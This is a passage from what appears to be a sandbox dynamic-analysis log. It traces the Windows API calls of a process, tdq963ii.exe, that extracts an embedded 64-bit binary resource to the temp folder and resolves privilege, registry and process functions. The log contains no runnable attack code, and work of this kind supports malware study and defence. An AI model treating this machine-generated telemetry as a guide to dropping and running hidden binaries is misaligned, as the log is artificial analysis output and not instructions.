¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0207.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ£|%¯äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0207.218] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x80) returned 0x5b8248 [0207.238] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0207.238] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0207.239] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5b8248) returned 0x80 [0207.239] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0207.240] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0207.240] GetCurrentProcess () returned 0xffffffff [0207.240] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0207.240] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0207.240] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0207.244] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0207.244] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0207.244] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0207.244] LockResource (hResData=0x43c648) returned 0x43c648 [0207.244] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b82d0 [0207.245] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.307] GetLastError () returned 0x20 [0207.307] GetLastError () returned 0x20 [0207.307] SetLastError (dwErrCode=0x20) [0207.308] GetLastError () returned 0x20 [0207.308] SetLastError (dwErrCode=0x20) [0207.308] GetLastError () returned 0x20 [0207.308] SetLastError (dwErrCode=0x20) [0207.309] GetLastError () returned 0x20 [0207.309] SetLastError (dwErrCode=0x20) [0207.309] GetLastError () returned 0x20 [0207.309] SetLastError (dwErrCode=0x20) [0207.309] GetLastError () returned 0x20 [0207.309] SetLastError (dwErrCode=0x20) [0207.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1000) returned 0x5b9828 [0207.310] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0207.312] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b7818 | out: hHeap=0x5a0000) returned 1 [0207.312] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0207.313] ExitProcess (uExitCode=0x1) [0207.313] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b60d0 | out: hHeap=0x5a0000) returned 1 Process: id = "207" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x1b2dc000" os_pid = "0x24c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "150" os_parent_pid = "0x598" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 766 os_tid = 0x540 [0209.100] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0209.100] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0209.100] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0209.101] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0209.102] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0209.102] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0209.102] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0209.102] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0209.102] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0209.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0209.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0209.105] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0209.106] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0209.107] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0209.108] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0209.109] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0209.109] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0209.109] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0209.110] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0209.111] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0209.111] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0209.111] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0209.111] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0209.111] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0209.111] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0209.111] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0209.111] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0209.111] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0209.111] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0209.112] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0209.112] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0209.112] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0209.112] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0209.112] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0209.112] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0209.112] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0209.112] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0209.113] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0209.113] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0209.113] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0209.113] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0209.113] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0209.113] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0209.113] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0209.113] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0210.096] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0210.103] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x35d0da60, dwHighDateTime=0x1d68287)) [0210.104] GetCurrentThreadId () returned 0x540 [0210.104] GetCurrentProcessId () returned 0x24c [0210.104] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=33044274336) returned 1 [0210.109] GetProcessHeap () returned 0x2f0000 [0210.599] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0210.599] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0210.600] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0210.600] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0210.600] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0210.600] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0210.600] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0210.600] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0210.600] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0210.601] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0210.601] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0210.601] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0210.601] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0210.601] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0210.602] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0210.602] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0210.602] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0210.602] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0210.602] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0210.602] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0210.603] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0210.603] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0210.603] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0210.603] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0210.603] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0210.603] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0210.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0210.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0210.604] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0210.604] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0210.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0210.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0210.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0210.604] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0210.618] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3bc) returned 0x307088 [0210.619] GetCurrentThreadId () returned 0x540 [0210.619] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x18) returned 0x307450 [0210.619] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x307470 [0210.619] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x8591c3f0, hStdError=0x0)) [0210.619] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0210.619] GetFileType (hFile=0x3) returned 0x2 [0211.687] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.687] GetFileType (hFile=0x7) returned 0x2 [0211.687] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0211.687] GetFileType (hFile=0xb) returned 0x2 [0211.688] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0211.688] GetEnvironmentStringsW () returned 0x307c78* [0211.688] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0xb7a) returned 0x308800 [0211.691] FreeEnvironmentStringsW (penv=0x307c78) returned 1 [0211.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0211.691] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x94) returned 0x307c78 [0211.694] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa0) returned 0x307d18 [0211.694] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3e) returned 0x304db8 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x6c) returned 0x307dc0 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x6e) returned 0x307e38 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x78) returned 0x2ff8e8 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x62) returned 0x307eb0 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x307f20 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x307f58 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x306a58 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x28) returned 0x307fa8 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x306a80 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4a) returned 0x307fd8 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x72) returned 0x2ff968 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x308030 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x308068 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1c) returned 0x306aa8 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xd2) returned 0x3080a0 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x7c) returned 0x308180 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x308208 